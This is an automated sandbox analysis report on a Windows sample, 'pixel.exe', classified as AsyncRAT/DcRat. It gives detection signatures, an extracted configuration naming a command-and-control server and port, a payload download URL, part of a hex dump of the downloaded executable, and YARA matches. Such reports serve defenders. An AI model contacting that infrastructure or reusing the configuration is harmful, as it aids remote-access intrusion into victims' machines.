Windows Analysis Report
pixel.exe

Overview

General Information

Sample name: pixel.exe
Analysis ID: 1669514
MD5: ff3d345e7beaacc2331438f8c6ad4a35
SHA1: 61f4363ff4a1ca05bb8bada5b3c5dd27da4426fe
SHA256: 092ab3035c0acf5eac0b160e95daae61e95b1c38a3c81f4bd478ba746c5f13f3
Tags: 185-39-17-70bookingclickfixexefakecaptchauser-JAMESWT_WT
Infos:

Detection

AsyncRAT, DcRat
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected DcRat
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious PE digital signature
Allocates memory in foreign processes
Compiles code for process injection (via .Net compiler)
Contains functionality to capture screen (.Net source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Suricata IDS alerts with low severity for network traffic
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
AsyncRAT AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.AsyncRAT as delivered by MintsLoader includes a PowerShell module with a DGA. The DGA is similar to MintsLoader's DGA, but generates more domains and uses more than one TLD. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
Name Description Attribution Blogpost URLs Link
DCRat DCRat is a typical RAT that has been around since at least June 2019. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

AV Detection

barindex
Source: http://185.39.17.70 Avira URL Cloud: Label: malware
Source: http://185.39.17.70/zgrnf/qxm.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\ualbvbed\ualbvbed.dll Avira: detection malicious, Label: TR/Dropper.Gen7
Source: 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: AsyncRAT {"Server": "185.39.17.70", "Port": "8848", "Version": "LoaderPanel", "MutexName": "hqjitjybornneksp", "Autorun": "false", "Group": "Default", "Certificate": "MIICMDCCAZmgAwIBAgIVAJHz+ah5/J2brULSjvSUc0iQ1oaHMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDExvYWRlciBQYW5lbDETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTI0MDYyMzE5MDc1MFoXDTM1MDQwMjE5MDc1MFowEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAKp2yro0uvnyW5zSOLP7+UN5jwwmGf7etJxfEbnoT2kASrj94YBBkn5ouLu6RKIQdEIKQe0D91DnNGjgAxIQS7832z2B/XbNNpMTRAUaSR7x9YMAfdKatsQ1yrw8jL+aHkMa9z3s9ZJ61GHL3rQap2/qRA3MCgjOE1HDkVM6ayshAgMBAAGjMjAwMB0GA1UdDgQWBBR4VbOZRjY+OVaHv5BXbYQIjfZ7xjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAH0z81fjHX24yLYTNwWHz+ksMjk2MtMs0roXCF1OjMdn9BSypbr2CQtHaOBvHi8Jd6GkOKaBVR/HHDCSwhyucirxMlvTRkOD4DPb4eEcY7R9uhbUjXUPRLv+8IVnawTyKKweTOCBKLttvyXQ2gXxmud7eyoUTre/TBECxlRahknH", "ServerSignature": "CVPJD93DL+2331qWjErlHyBf0bqnxvWR24DG8xoU2w8Fu23X270YtV59LTJ0N8Plv03LW3PY7akBWoRGmuVkQTXZTjcv1TQLGqEQKNF2nCgwXlAhcijHNy225rmayMaXZEEvzoQ67S1C0GVIrsA+nAluqxnqZDCYb05xbPj+Kbo="}
Source: pixel.exe Virustotal: Detection: 34% Perma Link
Source: pixel.exe ReversingLabs: Detection: 33%
Source: Submited Sample Neural Call Log Analysis: 99.7%
Source: 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp String decryptor: 8848
Source: 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp String decryptor: 185.39.17.70
Source: 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp String decryptor: LoaderPanel
Source: 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp String decryptor: false
Source: 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp String decryptor: hqjitjybornneksp
Source: 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp String decryptor: MIICMDCCAZmgAwIBAgIVAJHz+ah5/J2brULSjvSUc0iQ1oaHMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDExvYWRlciBQYW5lbDETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTI0MDYyMzE5MDc1MFoXDTM1MDQwMjE5MDc1MFowEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAKp2yro0uvnyW5zSOLP7+UN5jwwmGf7etJxfEbnoT2kASrj94YBBkn5ouLu6RKIQdEIKQe0D91DnNGjgAxIQS7832z2B/XbNNpMTRAUaSR7x9YMAfdKatsQ1yrw8jL+aHkMa9z3s9ZJ61GHL3rQap2/qRA3MCgjOE1HDkVM6ayshAgMBAAGjMjAwMB0GA1UdDgQWBBR4VbOZRjY+OVaHv5BXbYQIjfZ7xjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAH0z81fjHX24yLYTNwWHz+ksMjk2MtMs0roXCF1OjMdn9BSypbr2CQtHaOBvHi8Jd6GkOKaBVR/HHDCSwhyucirxMlvTRkOD4DPb4eEcY7R9uhbUjXUPRLv+8IVnawTyKKweTOCBKLttvyXQ2gXxmud7eyoUTre/TBECxlRahknH
Source: 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp String decryptor: CVPJD93DL+2331qWjErlHyBf0bqnxvWR24DG8xoU2w8Fu23X270YtV59LTJ0N8Plv03LW3PY7akBWoRGmuVkQTXZTjcv1TQLGqEQKNF2nCgwXlAhcijHNy225rmayMaXZEEvzoQ67S1C0GVIrsA+nAluqxnqZDCYb05xbPj+Kbo=
Source: 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp String decryptor: null
Source: 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp String decryptor: Default
Source: pixel.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: q costura.packetlib.pdb.compressed source: MSBuild.exe, 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\ualbvbed\ualbvbed.pdbe source: pixel.exe, 00000001.00000002.1300562415.0000000001380000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: q7C:\Users\user\AppData\Local\Temp\ualbvbed\ualbvbed.pdbt source: pixel.exe, 00000001.00000002.1301294702.0000000003151000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.costura.pdb.compressed source: pixel.exe, 00000001.00000002.1301294702.000000000311B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: q7C:\Users\user\AppData\Local\Temp\ualbvbed\ualbvbed.pdb source: pixel.exe, 00000001.00000002.1301294702.0000000003151000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: packetlibAcostura.packetlib.dll.compressedAcostura.packetlib.pdb.compressed#system.appcontextQcostura.system.appcontext.dll.compressed;system.collections.concurrenticostura.system.collections.concurrent.dll.compressed%system.collectionsScostura.system.collections.dll.compressed;system.collections.nongenericicostura.system.collections.nongeneric.dll.compressed=system.collections.specializedkcostura.system.collections.specialized.dll.compressed+system.componentmodelYcostura.system.componentmodel.dll.compressedKsystem.componentmodel.eventbasedasyncycostura.system.componentmodel.eventbasedasync.dll.compressedAsystem.componentmodel.primitivesocostura.system.componentmodel.primitives.dll.compressedGsystem.componentmodel.typeconverterucostura.system.componentmodel.typeconverter.dll.compressed source: pixel.exe, 00000001.00000002.1301294702.000000000311B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed5microsoft.win32.primitivesccostura.microsoft.win32.primitives.dll.compressed source: pixel.exe, 00000001.00000002.1301294702.000000000311B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.packetlib.pdb.compressed source: pixel.exe, 00000001.00000002.1301294702.000000000311B000.00000004.00000800.00020000.00000000.sdmp

Networking

barindex
Source: Network traffic Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 185.39.17.70:8848 -> 192.168.2.4:49724
Source: Network traffic Suricata IDS: 2861127 - Severity 1 - ETPRO MALWARE Observed Malicious SSL/TLS Certificate (DCRAT) : 185.39.17.70:8848 -> 192.168.2.4:49724
Source: Network traffic Suricata IDS: 2861128 - Severity 1 - ETPRO MALWARE Observed Malicious SSL/TLS Certificate (DCRAT Loader Panel) : 185.39.17.70:8848 -> 192.168.2.4:49724
Source: global traffic TCP traffic: 192.168.2.4:49724 -> 185.39.17.70:8848
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 18 Apr 2025 17:49:07 GMTAccept-Ranges: bytesETag: "a39caa2e8ab0db1:0"Server: Microsoft-IIS/10.0Date: Sun, 20 Apr 2025 05:29:20 GMTContent-Length: 1548800Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 47 05 da d5 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 98 17 00 00 08 00 00 00 00 00 00 8e b7 17 00 00 20 00 00 00 c0 17 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 18 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 b7 17 00 4b 00 00 00 00 c0 17 00 aa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 17 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 97 17 00 00 20 00 00 00 98 17 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 aa 05 00 00 00 c0 17 00 00 06 00 00 00 9a 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 17 00 00 02 00 00 00 a0 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 b7 17 00 00 00 00 00 48 00 00 00 02 00 05 00 88 97 16 00 b8 1f 01 00 01 00 00 00 d9 00 00 06 e0 7c 00 00 a6 1a 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 57 00 07 80 c2 18 00 48 33 c0 c3 00 00 00 00 b8 57 00 07 80 c3 00 00 33 c0 c2 14 00 00 00 00 1e 17 28 5d 01 00 06 2a 1e 02 28 17 00 00 0a 2a 32 02 7b 07 00 00 04 28 d0 00 00 06 2a da 73 18 00 00 0a 25 72 01 00 00 70 6f 1a 00 00 0a 72 2f 00 00 70 6f 1e 00 00 0a 25 72 2f 00 00 70 6f 1a 00 00 0a 02 6f 1e 00 00 0a 6f 1f 00 00 0a 28 d4 00 00 06 2a da 73 18 00 00 0a 25 72 01 00 00 70 6f 1a 00 00 0a 72 3b 00 00 70 6f 1e 00 00 0a 25 72 45 00 00 70 6f 1a 00 00 0a 02 6f 1e 00 00 0a 6f 1f 00 00 0a 28 d4 00 00 06 2a 56 28 23 00 00 0a 73 24 00 00 0a 20 20 02 00 00 6f 25 00 00 0a 2a 62 7e 02 00 00 04 2c 10 7e 02 00 00 04 6f 26 00 00 0a 14 80 02 00 00 04 2a 66 7e 04 00 00 04 28 20 00 00 0a 2c 0c 28 0a 00 00 06 2c 05 28 0d 00 00 06 2a 8e 0f 00 28 0f 00 00 06 0f 01 28 10 00 00 06 d0 02 00 00 1b 28 27 00 00 0a 28 28 00 00 0a a5 02 00 00 1b 2a 1a 7e 1f 00 00 04 2a 1e 02 80 1f 00 00 04 2a 1a 7e 20 00 00 04 2a 1e 02 80 20 00 00 04 2a 1a 7e 21 00 00 04 2a 1e 02 80 21 00 00 04
Source: global traffic HTTP traffic detected: GET /zgrnf/qxm.exe HTTP/1.1Host: 185.39.17.70Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: RU-TAGNET-ASRU RU-TAGNET-ASRU
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49723 -> 185.39.17.70:80
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: unknown TCP traffic detected without corresponding DNS query: 185.39.17.70
Source: global traffic HTTP traffic detected: GET /zgrnf/qxm.exe HTTP/1.1Host: 185.39.17.70Connection: Keep-Alive
Source: pixel.exe, 00000001.00000002.1301294702.0000000003108000.00000004.00000800.00020000.00000000.sdmp, pixel.exe, 00000001.00000002.1301294702.00000000030A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.39.17.70
Source: pixel.exe, 00000001.00000002.1301294702.00000000030A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.39.17.70/zgrnf/qxm.exe
Source: pixel.exe, 00000001.00000002.1301294702.0000000003112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.39.4
Source: pixel.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: pixel.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: pixel.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: pixel.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: pixel.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: pixel.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSBuild.exe, 00000009.00000002.2507110634.0000000001130000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: MSBuild.exe, 00000009.00000002.2512600887.0000000005700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: pixel.exe String found in binary or memory: http://ocsp.digicert.com0A
Source: pixel.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: pixel.exe String found in binary or memory: http://ocsp.digicert.com0X
Source: pixel.exe, 00000001.00000002.1301294702.0000000003108000.00000004.00000800.00020000.00000000.sdmp, pixel.exe, 00000001.00000002.1301294702.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2508103719.0000000003170000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7700, type: MEMORYSTR
Source: 1.2.pixel.exe.42895d0.4.raw.unpack, Packet.cs .Net Code: GetScreen

System Summary

barindex
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 1.2.pixel.exe.311b8f0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 1.2.pixel.exe.311b8f0.0.raw.unpack, type: UNPACKEDPE Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 1.2.pixel.exe.311b8f0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 1.2.pixel.exe.311fd78.2.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 1.2.pixel.exe.311fd78.2.raw.unpack, type: UNPACKEDPE Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 1.2.pixel.exe.311fd78.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 1.2.pixel.exe.42895d0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 1.2.pixel.exe.42895d0.4.raw.unpack, type: UNPACKEDPE Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 1.2.pixel.exe.42895d0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 1.2.pixel.exe.42895d0.4.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 1.2.pixel.exe.42895d0.4.unpack, type: UNPACKEDPE Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 1.2.pixel.exe.42895d0.4.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 1.2.pixel.exe.311b8f0.0.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 1.2.pixel.exe.311b8f0.0.unpack, type: UNPACKEDPE Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 1.2.pixel.exe.311b8f0.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 1.2.pixel.exe.30cf964.1.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 1.2.pixel.exe.30cf964.1.unpack, type: UNPACKEDPE Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 1.2.pixel.exe.30cf964.1.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 1.2.pixel.exe.311fd78.2.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 1.2.pixel.exe.311fd78.2.unpack, type: UNPACKEDPE Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 1.2.pixel.exe.311fd78.2.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 00000009.00000002.2508103719.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000009.00000002.2508103719.00000000031BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000009.00000002.2507110634.0000000001130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: MSBuild.exe PID: 7700, type: MEMORYSTR Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: pixel.exe, -Module-.cs Long String: Length: 12197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_02E73ED8 NtProtectVirtualMemory, 9_2_02E73ED8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_02E73A80 NtProtectVirtualMemory, 9_2_02E73A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_02E73308 9_2_02E73308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_02E79158 9_2_02E79158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_02E79658 9_2_02E79658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_02E78888 9_2_02E78888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_02E732F7 9_2_02E732F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_02E78540 9_2_02E78540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_02E73A80 9_2_02E73A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_02E7CA90 9_2_02E7CA90
Source: pixel.exe Static PE information: invalid certificate
Source: pixel.exe, 00000001.00000002.1301294702.000000000311B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameStub.exe, vs pixel.exe
Source: pixel.exe, 00000001.00000000.1265494491.0000000000DBE000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameStub.exe0 vs pixel.exe
Source: pixel.exe, 00000001.00000002.1303652563.0000000005870000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameualbvbed.dll4 vs pixel.exe
Source: pixel.exe, 00000001.00000002.1301294702.00000000030DD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameStub.exe, vs pixel.exe
Source: pixel.exe, 00000001.00000002.1301294702.0000000003151000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameualbvbed.dll4 vs pixel.exe
Source: pixel.exe, 00000001.00000002.1300562415.00000000012FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs pixel.exe
Source: pixel.exe Binary or memory string: OriginalFilenameStub.exe0 vs pixel.exe
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
